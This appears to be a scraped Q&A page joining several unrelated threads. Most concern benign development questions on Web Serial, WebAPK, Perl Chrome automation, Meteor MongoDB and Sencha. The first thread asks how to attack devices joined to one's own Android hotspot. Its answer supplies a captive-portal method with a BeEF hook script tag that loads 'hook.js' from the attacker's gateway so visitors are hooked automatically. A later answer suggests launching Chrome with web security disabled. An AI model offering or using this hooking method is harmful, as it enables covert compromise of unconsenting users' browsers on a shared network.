I'm runnning the Kali Nethunter on my android and i'm able to get the beef-xss running on it fine.
The js hooks are on the http://gateway:3000/hooks.js
But i can't use mitmf to inject as i'm running my own hotspot of android phone.
Is there any program which would let me do attacks to my clients that are connected to my hotspot?
If you control the hotspot, set up a Captive Portal with the malicious JS in it, inside the HTML code.
Example:
<script src=”http://gateway:3000/hook.js” type=”text/javascript”></script>
That way they must automatically hook to you ;)
Related
I'm building a PWA with Nuxt.js that uses the Web Serial API to communicate with our proprietary hardware. It works as expected (i.e. the port will be available without user action the next time you load the web app unless the browser security is reset) on Windows 10/11 and macOS devices, but the device this application will be running on is a Raspberry Pi 4 running the latest stable Rasbian release. On the only two browsers I've found that can run on the Raspberry Pi and support the Web Serial API are Chromium and Vivaldi. In both of those browser, there is an issue remembering which port(s) the user has already allowed access to.
In Chromium, even a page refresh will cause the port permissions to reset, requiring the user grant access to the serial port again. In Vivaldi, the permissions can survive a page refresh, but restarting to browser will cause it to forget any prior port authorizations.
I have not been able to find any option to whitelist websites in the browser settings the way you can for some other security/privacy options, like you can with things like website clipboard access, nor any way to disable the security feature altogether.
This will be running on custom hardware that ships with the software, so there are no limitations to what can be modified to resolve or work around this. The device is touchscreen only, and the app will be running in a fullscreen kiosk mode at boot. There just needs to be some way to prevent the user from needing to select a port like /dev/s0 and grant the web app access to it every single time they turn the device on.
My corporate VPN blocks all external traffic from an Android device. I am trying to test PWA that is internally hosted (all resources inside a firewall). What I observe is that despite passing Lighthouse audit my PWA fails the WebAPK creation process on a device. Specifically, the install process takes a long time, and eventually it degrades to an application shortcut install.
What I did:
Built the simplest PWA that I could think of (index.html registering service worker + sw.js with fetch even handling index.html request offline + web manifest) and hosted it on an internal server
Run Lighthouse audit on the desktop and made sure it passes all PWA Lighthouse audits
Run bubblewrap init on the manifest to double check that icons/names are OK
Tried to install PWA on an a Pixel phone from Chrome's dot dot dot menu behind firewall
After a long time, the application shortcut was installed (with Chrome overlay icon)
Checked chrome://webapks/ on my phone - no surprises here, I did not find WebAPK for my app
Turn on my corporate VPN workaround, which allows me to bypass VPN restrictions and access external addresses (rooted phone + ProxyDroid hackery)
Now WebAPK creation works
Question 1:
Could someone please explain what is involved in WebAPK creation that would make it fail behind a strict corporate firewall? Is there any external resource (a service perhaps?) involved here that I could advocate my corporate VPN to whitelist? If not, any advice of how to have automatic tests for WebAPK creation would be appreciated. I thought of using bubblewrap build, but, since it is for TWA's, I did not expected it to pass for my simple PWA.
Question 2:
In general, what is the best technique for diagnosing WebAPK creation failures for PWA's that pass Lighthouse audit?
The WebAPK is generated server-side by Chrome. Chrome sends details from the manifest, along with the icons to it's server, which then returns the WebAPK. As you pointed out, it's most likely your corporate firewall is blocking that request to the server, preventing Chrome from generating the WebAPK.
The code for generating WebAPKs in Chrome can be found here
For your second question, we don't really have good tools for debugging that, if Lighthouse passes, it should build the WebAPK (with the exception noted above). I suspect you could connect the device to your computer and use ADB to look at logs, but thats... ugly. Sorry.
I was looking for a way to check for changes in a specific URL provided by the user. I wrote a script that I ran at home that can do that successfully using WWW::Mechanize. The thing is, I need to run it in another computer network that has a group policy that blocks all $mech->get($url) requests (it's not firewall problems, I let Perl through), so I thought I'll try and work around this problem by letting Perl control the web browser.
The computers in the network run Google Chrome and IE8 only and I can't install Firefox due to another policy (thought of using WWW::Mechanize::Firefox). I don't want to invoke IE8 in the script because most of the URLs that will be provided will be of websites that don't work well with it, so that leaves me with Chrome only.
Searching for a module that can do that, I only found AnyEvent::Chromi:
which exposes all of the Chrome Extensions API via a websocket connection.
This doesn't work (the policy probably blocks that websocket as well).
Is there another way to work around this problem/control Chrome from within a Perl script?
Is there another way to work around this problem/control Chrome from
within a Perl script?
WWW::Mechanize::Chrome
Like WWW::Mechanize, this module automates web browsing with a Perl object. Fetching and rendering of web pages is delegated to the Chrome (or Chromium) browser by starting an instance of the browser and controlling it with Chrome DevTools.
You can also do this from scratch without using any CPAN modules.
I tested this on Linux (Ubuntu 16.04, Google Chrome version 53) using Unix Domain (UD)
sockets. Unfortunately, it seems Windows does not have UD sockets, but
it should be possible to do same from Windows using named pipes.
First, make sure google-chrome is running in the background. We will
need to create a Chrome App
that will communicate
with a native host through the native messaging
API. The
native host can be any script that reads messages from its STDIN and
returns replies through its STDOUT. I tested both a Python
script and a Perl script.
Now, in order for a standalone Perl script to communicate with the
Chrome browser, it will send request through a UD socket (created by
the native host) to the native host; the native host will then
forward the request to google-chrome through its standard output
pipe. Then the Chrome App (written in JavaScript)
will receive the request. The Chrome App will use the Chrome
JavaScript APIs to get the requested data and return it to the native
host. Finally, the native host forwards the result through the socket to
the Perl script.
As you can see, there are some details required for setting this up, but I can
confirm that it works on my Linux platform. Please let me know if you need more
details.
Since you mentioned IE8, I'm assuming that you're dealing with a Windows system. And since you mentioned that you had considered WWW:Mechanix::Firefox, it sounds like you are not being restricted to just core modules.
Based on that, the only way that I can think of to automate the Chrome broswer would be to use Win32::GuiTest to control the Chrome browser. If you can figure out how to manually drive your testing using only keyboard input (i.e. no mouse), that would make things easier than trying to figure out the mouse emulation to get the cursor to the correct position for various tasks.
I'm not sure if that's necessarily a route that you will like to use or not. It's just the only way that I can think of to accomplish what you want to do with the restrictions that you have to deal with.
I've seen in a lot of places that in order to use an External Mongodb in Meteor applications, you should use an Environment Variable MONGO_URL. However, I'm building my application to work both as web app and mobile app (by generating an apk).
The problem is that when I start meteor as MONGO_URL='mongodb://user:pwd#path.mlab.com:9999/db' meteor it works well in my computer. But, it's not possible (I haven't found any way of doing so yet) to do this in mobile.
So, anyone has any idea of how I could use an external mongodb in mobile applications?
Thanks!
It seems to me that you are confused about how Meteor works, and more generally the client-server architecture.
Only your server has access to your database (whether on the same machine or at a third party provider), so that you keep control of exactly what your Client has access to.
By "Client", we mean what your visitor uses to access your app, whether a web app through a browser, or a mobile app through a Cordova wrapper.
So your mobile app only needs to know the URL of the server it has to connect to. That is specified by the --server option when you do your meteor build.
Then your server needs to know how to access the external MongoDB. This is your MONGO_URL environment variable. In production, you would set this variable on your server host. Each provider offers a different method to configure those environment variables, most of the time there is a graphical administration panel.
Note that the way Meteor works, you can use the same server to support both your web app and mobile app at the same time.
Finally, you can also test on mobile using meteor run android instead of just meteor (or with ios instead of Android, but you need a Mac). Of course you can still specify your MONGO_URL variable in the CLI when testing, exactly like you have done when testing on browser.
For mobile (cordova) meteor applications think of the app as just a web view with the ability to access native device features (camera, bluetooth ...). Since the application is basically a web view, the underlying mongodb associated with it is the same. If you want mobile device specific storage take a look at GroundDB
For your situation, if sounds like your mobile app is having problems connecting to your server, ultimately not allowing it to pull data from the mongoDB. Make sure that when you build the mobile application you have server specifed '--mobile-server'. Also if you are running it locally, make sure your mobile device is on the same network as your computer and any firewalls that might not allow connections are disabled.
Does anyone have any idea on how to run a sencha touch 2 app without installing a web server (like LAMP/XAMP). (PS : I'm new to Sencha Touch)
I know there is one way - Including phonegap's javascript file in the app.json of the Sencha Touch 2 app. Which'll look like this
"js":
{
"path": "cordova-2.5.0.js"
}
After this the sample application runs on the browser without the web server.
Is there ANY other way?
How does adding the phonegap js file help in running the sencha touch app without web server anyway??
Starting chrome with --allow-file-access-from-files --disable-web-security flags also does the trick.
Sencha requires web server because if app is in development mode microloader in sencha make Ajax request for app.json file and from it, it loads other files. You can see this in
../sencha-sdk/mircroloader/development.js
file with following code -
var xhr = new XMLHttpRequest();
xhr.open('GET', 'app.json', false);
When you start chrome with above mentioned flags, chrome does allow making ajax requests even if file opened with file://.... url scheme.
When you deploy the app after compressing js/css with sencha cmd, all files are bunched into one single file. You no more need a webserver in that case.
Update
From Cordova docs for Whitelisting domain
Domain whitelisting in Apache Cordova is a security model that controls access to outside domains, such as http://google.com. The default security policy is to block all network access. The application developer can then declare access to specific network domains and subdomains.
And
In the Widget Access specification, the element is used to declare access to specific network domains. In the future, Apache Cordova will abstract the platform whitelisting implementations to the W3C Widget Access specification. However, for now each platform must implement it's own domain whitelisting.
Moreover, W3C Widget Access does not enclose the security and user agent enforce policy. It is defined in XMLHTTPRequest.
So what Cordova essential does is, adds an exception in policy to allow access to certain network resource outside app domain with whitelisted domains.